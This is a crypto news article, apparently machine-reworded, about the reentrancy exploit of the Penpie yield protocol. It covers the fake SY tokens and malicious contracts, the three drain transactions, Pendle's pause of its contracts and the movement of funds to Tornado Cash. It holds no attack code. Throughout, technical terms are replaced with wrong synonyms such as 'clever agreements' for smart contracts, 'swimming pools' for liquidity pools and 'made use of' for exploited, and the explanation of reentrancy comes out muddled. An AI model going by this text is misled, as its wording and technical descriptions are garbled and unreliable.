Penpie made use of for $27 million in reentrancy attack

  • September 23, 2024
Penpie made use of for $27 million in reentrancy attack

Penpie made use of for $27 million in reentrancy attack Gino Matos · 3 weeks ago · 2 minutes checked out

The exploiter developed harmful clever agreements and phony tokens to serve as genuine liquidity swimming pools to fool Penpie’s agreement.

2 minutes checked out

Upgraded: Sep. 4, 2024 at 9:09 pm UTC

Cover art/illustration by means of CryptoSlate. Image consists of combined material which might consist of AI-generated material.

Yield procedure Penpie got made use of for $27 million on Sept. 3 after a harmful representative checked out a vulnerability in the procedure’s clever agreements.

Penpie is a yield procedure on Pendle that intends to increase benefits for users on the network.

Reentrancy made use of

In a Sept. 4 breakdown, blockchain security company Hacken discussed that the opponent utilized a swimming pool with phony tokens to carry out the break-in. The exploiter produced worthless variations of Pendle’s yield-bearing tokens, Standardized Yield (SY), and connected them to important possessions.

The aggressor released 5 destructive agreements to serve as genuine liquidity swimming pools and technique Penpie’s benefits system, however just 3 of them were utilized. He then leveraged the phony SY tokens as tickets to declare genuine yield.

3 attack deals were performed in between 6:25 P.M. and 6:42 P.M. UTC. The very first deal drawn out the greatest quantity, siphoning $15.7 million, followed by 2 other deals that took $5.6 million each out of Penpie’s agreement.

The exploiter got away with 695 Restaked Swell ETH (rswETH), 4,101 Kelp Gain (agETH), 2,723 Wrapped Staked ETH (wstETH), and 2.52 million Staked Ethena USD (sUSDe).

The staying 2 destructive agreements released by the exploiter were not utilized in the attack, which was enabled due to a reentrancy vulnerability in Penpie’s agreement.

A reentrancy vulnerability happens when an agreement requires to make an external call to another wise agreement before upgrading its own state. Hence, harmful agreements can deceive the procedure by altering info and inputting actions.

Significantly, the losses might have been bigger. Pendle recognized the destructive deals and paused its agreements at 6:45 P.M. UTC, 3 minutes after the 3rd attack. Hacken highlighted:

“This was essential, as the aggressor released a 4th destructive agreement just a minute later on. Stopping briefly Pendle’s agreements successfully stopped the make use of, avoiding more loss.”

The entire batch of tokens was transformed to Ethereum (ETH), totaling up to approximately 10,113 ETH. The exploiter moved 3,000 ETH to the mixer service Tornado Cash and presently holds 7,113.27 ETH, according to on-chain information.

The Penpie group connected to the made use of by means of an on-chain message and an X post acknowledging the hack and declaring to be available to working out a bounty in exchange for the funds taken. They assured that no legal action would be pursued.

Discussed in this articleLatest United States StoriesLatest Press Releases » …
Learn more